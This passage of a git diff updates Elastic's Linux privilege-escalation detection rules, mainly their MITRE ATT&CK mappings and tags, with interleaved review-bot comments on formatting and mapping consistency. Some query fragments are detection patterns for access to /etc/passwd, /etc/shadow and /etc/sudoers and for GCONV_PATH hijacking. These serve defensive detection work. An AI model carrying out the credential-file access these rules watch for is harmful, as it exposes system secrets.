-updated_date = "2026/01/26"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
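Review bot: The rebuilt `[rule.threat.tactic]` block in persistence_web_server_unusual_command_execution.toml ends with `reference = "https://attack.mitre.org/tactics/TA0003/"` and is followed immediately by `[rule.new_terms]`, with no blank line between the two tables, while every other table in the hunk is separated by one. The same separator is dropped in privilege_escalation_dac_permissions.toml and privilege_escalation_ld_preload_shared_object_modif.toml, where the blank line before `[rule.new_terms]` is an explicit deletion, and in privilege_escalation_potential_bufferoverflow_attack.toml before `[rule.threshold]`. TOML accepts it, but it reads as a serializer artifact and will come back as whitespace noise on the next regeneration; restoring the single blank line in each of the four files keeps them consistent with the rest of the rule set.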
@@ -85,15 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -126,21 +118,6 @@ file.path : ("/usr/lib/yum-plugins/*", "/etc/yum/pluginconf.d/*") and not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-
-[[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1546.016"
-name = "Installer Packages"
-reference = "https://attack.mitre.org/techniques/T1546/016/"
-
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
@@ -150,11 +127,3 @@ reference = "https://attack.mitre.org/techniques/T1574/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml
index bfc29e3bbe6..4258204ccb0 100644
--- a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml
+++ b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/28"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -87,19 +87,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Tactic: Credential Access",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Auditd Manager",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -112,29 +100,16 @@ process where host.os.type == "linux" and event.type == "start" and
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
+id = "T1222"
+name = "File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/"
 
 [[rule.threat.technique.subtechnique]]
-id = "T1003.008"
-name = "/etc/passwd and /etc/shadow"
-reference = "https://attack.mitre.org/techniques/T1003/008/"
+id = "T1222.002"
+name = "Linux and Mac File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/002/"
 
 [rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml
index 1e3ddd54ee1..724edb03756 100644
--- a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml
+++ b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/01"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
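Review bot: The single remaining `[[rule.threat]]` entry for privilege_escalation_chown_chmod_unauthorized_file_read.toml now carries only T1222.002 under Defense Evasion, and the tags hunk on the previous line drops `Tactic: Credential Access` together with `Tactic: Privilege Escalation`. The file name still describes an unauthorized read of protected files, and the deleted T1003.008 (`/etc/passwd and /etc/shadow`) mapping was the only link to that outcome; the query sits outside the hunk, so if it still keys on those credential files, a second `[[rule.threat]]` entry for Credential Access next to the new Defense Evasion one would keep that coverage visible in ATT&CK-based reporting. If the narrowing is deliberate, the file-name prefix and the retained tactic now disagree, which is worth a follow-up rename or a short note so the next reader does not re-open the question.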
@@ -119,6 +119,11 @@ id = "T1068"
 name = "Exploitation for Privilege Escalation"
 reference = "https://attack.mitre.org/techniques/T1068/"
 
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
diff --git a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml
index cbb17f3d837..a71a1c7ecf2 100644
--- a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml
+++ b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/01"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/10/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -118,6 +118,16 @@ id = "T1068"
 name = "Exploitation for Privilege Escalation"
 reference = "https://attack.mitre.org/techniques/T1068/"
 
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.003"
+name = "Sudo and Sudo Caching"
+reference = "https://attack.mitre.org/techniques/T1548/003/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
diff --git a/rules/linux/privilege_escalation_dac_permissions.toml b/rules/linux/privilege_escalation_dac_permissions.toml
index d6e99458e84..0071f7af161 100644
--- a/rules/linux/privilege_escalation_dac_permissions.toml
+++ b/rules/linux/privilege_escalation_dac_permissions.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/01/08"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -81,14 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -118,15 +111,42 @@ process.command_line:(*/etc/sudoers* or */etc/passwd* or */etc/shadow* or */root
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1003.008"
+name = "/etc/passwd and /etc/shadow"
+reference = "https://attack.mitre.org/techniques/T1003/008/"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.004"
+name = "Private Keys"
+reference = "https://attack.mitre.org/techniques/T1552/004/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
 
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.name"]
diff --git a/rules/linux/privilege_escalation_enlightenment_window_manager.toml b/rules/linux/privilege_escalation_enlightenment_window_manager.toml
index 163762f1cb3..e1b8b16be7c 100644
--- a/rules/linux/privilege_escalation_enlightenment_window_manager.toml
+++ b/rules/linux/privilege_escalation_enlightenment_window_manager.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/01/05"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/02/04"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -102,14 +102,23 @@ Enlightenment, a Linux window manager, can be exploited for privilege escalation
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1068"
 name = "Exploitation for Privilege Escalation"
 reference = "https://attack.mitre.org/techniques/T1068/"
 
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.001"
+name = "Setuid and Setgid"
+reference = "https://attack.mitre.org/techniques/T1548/001/"
 
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml
index d9f136f68e5..d4788a96ec1 100644
--- a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml
+++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/01/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/02/04"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -104,24 +104,18 @@ The CAP_SYS_PTRACE capability in Linux allows processes to trace and control oth
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1055"
 name = "Process Injection"
 reference = "https://attack.mitre.org/techniques/T1055/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1055.008"
 name = "Ptrace System Calls"
 reference = "https://attack.mitre.org/techniques/T1055/008/"
-
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
-
 
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml
index b03edb7d5b6..054d95fe8dc 100644
--- a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml
+++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/01/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/02/04"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -47,16 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Tactic: Execution",
- "Tactic: Command and Control",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 
 type = "eql"
 query = '''
@@ -106,53 +97,18 @@ GDB, a debugger, can be granted the CAP_SYS_PTRACE capability, allowing it to tr
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1055"
 name = "Process Injection"
 reference = "https://attack.mitre.org/techniques/T1055/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1055.008"
 name = "Ptrace System Calls"
 reference = "https://attack.mitre.org/techniques/T1055/008/"
-
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
-
 
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
diff --git a/rules/linux/privilege_escalation_kworker_uid_elevation.toml b/rules/linux/privilege_escalation_kworker_uid_elevation.toml
index 5c695d128cc..7d5039f65fc 100644
--- a/rules/linux/privilege_escalation_kworker_uid_elevation.toml
+++ b/rules/linux/privilege_escalation_kworker_uid_elevation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/26"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/02/04"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -102,31 +102,31 @@ Kworker processes are integral to Linux, handling tasks like interrupts and back
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
-[[rule.threat.technique.subtechnique]]
-id = "T1574.013"
-name = "KernelCallbackTable"
-reference = "https://attack.mitre.org/techniques/T1574/013/"
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1014"
-name = "Rootkit"
-reference = "https://attack.mitre.org/techniques/T1014/"
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
+[[rule.threat.technique.subtechnique]]
+id = "T1036.005"
+name = "Match Legitimate Resource Name or Location"
+reference = "https://attack.mitre.org/techniques/T1036/005/"
 
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 
 
diff --git a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml
index 046ac09030c..a6d82d08750 100644
--- a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml
+++ b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/27"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
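Review bot: In the new T1036 block of privilege_escalation_kworker_uid_elevation.toml, `+reference = "https://attack.mitre.org/techniques/T1036/"` is followed directly by `+[[rule.threat.technique.subtechnique]]` with no blank line, while the T1574 block added lower in the same hunk separates every table with one. The T1574.013 block being replaced had the same quirk, so this looks carried over rather than intended; inserting the blank line between the technique's `reference` and the `[[rule.threat.technique.subtechnique]]` header puts both new blocks in the same style and matches the layout used across the other rule files in this commit.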
@@ -93,15 +93,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit
 - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 
@@ -124,11 +116,28 @@ id = "T1574.006"
 name = "Dynamic Linker Hijacking"
 reference = "https://attack.mitre.org/techniques/T1574/006/"
 
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id"]
diff --git a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml
index af3b13bbbe3..b3d0de5378e 100644
--- a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml
+++ b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/27"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/02/04"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -46,15 +46,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Tactic: Credential Access",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -118,29 +110,24 @@ Symbolic links in Linux are shortcuts that point to files or directories, facili
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1003.008"
-name = "/etc/passwd and /etc/shadow"
-reference = "https://attack.mitre.org/techniques/T1003/008/"
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
 
 [rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml
index e2af607fc77..a34e1b9a628 100644
--- a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml
+++ b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/09"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -93,20 +93,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Privilege Escalation",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: Auditd Manager",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -122,47 +109,11 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1611"
-name = "Escape to Host"
-reference = "https://attack.mitre.org/techniques/T1611/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1547"
-name = "Boot or Logon Autostart Execution"
-reference = "https://attack.mitre.org/techniques/T1547/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1547.006"
-name = "Kernel Modules and Extensions"
-reference = "https://attack.mitre.org/techniques/T1547/006/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1601"
 name = "Modify System Image"
 reference = "https://attack.mitre.org/techniques/T1601/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1601.001"
-name = "Patch System Image"
-reference = "https://attack.mitre.org/techniques/T1601/001/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml
index 9df3d417f82..1fe818619b2 100644
--- a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml
+++ b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/26"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -100,31 +100,23 @@ file where host.os.type == "linux" and file.path : "/*GCONV_PATH*"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1068"
 name = "Exploitation for Privilege Escalation"
 reference = "https://attack.mitre.org/techniques/T1068/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
 
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
 reference = "https://attack.mitre.org/techniques/T1574/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1574.007"
-name = "Path Interception by PATH Environment Variable"
-reference = "https://attack.mitre.org/techniques/T1574/007/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
 
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml b/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml
index 57ae0855eb1..8859e41599e 100644
--- a/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml
+++ b/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml
@@ -1,7 +1,7 @@
 [metadata]
 creation_date = "2023/12/11"
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -83,29 +83,29 @@ Buffer overflow attacks exploit vulnerabilities in software to execute arbitrary
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
[[rule.threat.technique]]
id = "T1190"
name = "Exploit Public-Facing Application"
reference = "https://attack.mitre.org/techniques/T1190/"
-
[rule.threat.tactic]
id = "TA0001"
name = "Initial Access"
reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
[rule.threshold]
field = ["event.kind", "host.id"]
value = 100
diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml
index f7d626e37d7..7aa6f9831f5 100644
--- a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml
+++ b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml
@@ -2,7 +2,7 @@
creation_date = "2024/06/17"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -84,15 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Privilege Escalation",
- "Tactic: Persistence",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -141,11 +133,6 @@ process where host.os.type == "linux" and event.type == "start" and event.action
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
